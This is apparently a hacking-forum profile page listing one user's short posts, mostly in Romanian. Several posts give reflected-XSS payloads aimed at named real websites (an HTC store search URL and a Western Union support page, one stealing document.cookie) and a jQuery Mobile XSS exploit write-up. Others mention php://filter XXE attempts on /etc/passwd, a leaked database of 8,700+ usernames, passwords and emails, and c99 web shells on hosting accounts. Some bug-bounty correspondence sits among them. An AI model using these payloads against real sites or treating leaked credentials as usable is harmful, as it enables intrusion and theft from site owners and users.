Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


Everything posted by dr.d3v1l

  1. https://github.com/Konloch/bytecode-viewer
  2. INFO -> http://www.telecomitalia.com/tit/it/footer/responsible-disclosure.html ->
  3. Dear Dr.d3v1l The vulnerabilities you reported has been fixed. As a token of our appreciation we would like to offer you a t-shirt. If you would like a t-shirt please provide us with your preferred t-shirt size (S/M/L/XL/XXL) and on what address you would like to receive the t-shirt. Thanks in advance for your reply and thanks again for your report. Sincerely,
  4. leak database 8700+ (user,pass,mail ecc)
  6. aici spunea ca mar hof aveai http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php
  7. http://estore.htc.com/tw/buy/zh-TW/shop/SearchDisplay?searchTerm=asd'- confirm(document.domain)-'&storeId=10001&catalogId=10001&langId=-7&pageSize =20&beginIndex=0&sType=SimpleSearch&resultCatEntryType=2&showResultsPa ge=true&searchSource=Q&pageView=
  8. 5) da sunt autizat , doar ca au cerut ce pot exploita . De asta am pus ($$) , dar din cate am mai verificat ... nu merge
  9. am incerca si cuv gopher:// file:// ftp:// php://filter/convert.base64-encode/resource=/etc/passwd , dar nimica . Am log per server de la request dar nu pot citi etc/passwd
  10. Salut Rst , cum as putea exploita complet aceasta xxe ? Am vazut un pic de topic de la owasp , da este local daca nu gresesc da se poate face si remote cred din cate am citit *Ofer o mica suma pentru cine ma ajuta sa gasesc un exploit valid .
  11. http://www.ipgeek.net/ ______________________________________ IP: Decimal:1839630414 ISP:Orange RomaniaOrganization:Orange RomaniaTime zone:Europe/BucharestIP Latitude:46 Longitude:25 Continent:EU
  12. STATE:DUPLICATE bugbounty:https://hackerone.com/pornhub
  13. CTF DOWNLOAD ---> https://www.vulnhub.com/entry/sickos-11,132/ "This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them." _____________________________________________________________________________________________________________________________________________________ Există mai multe metode pentru ao rezolva : https://www.vulnhub.com/entry/sickos-11,132/#wa
  14. Google ---> PDF . https://www.exploit-db.com/papers/ https://torrentz.eu/e90e81823b05850859879c163082d34ccd479389
  15. pai , din situ-l oficial ma trimis acolo , >.< , credeam ca era bun ahah
  16. Product Avactis PHP Shopping Cart Version 4.7.9.Next.47900 Full Disclosure EXPLOIT DB
  17. custsupport.westernunion.com EXPLOIT: <script>alert(document.domain)</SCRIPT><input value=a onclick=alert(document.cookie) id=textbox> BUGBOUNTY: out of scope
  18. Hello, Thank you for reporting this issue to the Microsoft Security Response Center (MSRC). Self-XSS is not considered a security vulnerability as it requires social engineering. Please see the following for more information: "Definition of a Security Vulnerability" <https://msdn.microsoft.com/en-us/library/cc751383.aspx> "Online Services Bug Bounty Terms" <https://technet.microsoft.com/en-us/security/dn800983> Thanks, @n3curatu
  19. eu c99 . si alte ftp . 80 account hosting ... @rodeveloper
  20. # Exploit Title: jQuery Mobile Docs 1.2.0 final XSS Reflected # Software Link: jQuery Mobile: Demos and Documentation # Exploit Author: Dr.d3v1l # Tested On : Windows FireFox # CVE : N/A # Category: webapps # Date: 05/09/2015 1. Description Reflective XSS on forms-sample-response.php?shipping= 2. POC URL: 404 Not Found e.g. code: "><img src="http://url.to.file.which/not.exist" onerror=alert(1);> URL+CODE= http://localhost/fileadmin/mobile_site/templates/docs/forms/forms-sample-response.php?shipping="><img src="http://url.to.file.which/not.exist" onerror=alert(1);> 3. S
  21. mai nu imi mai aduc minte :3 . era in "dsl service" @Anonym13
  • Create New...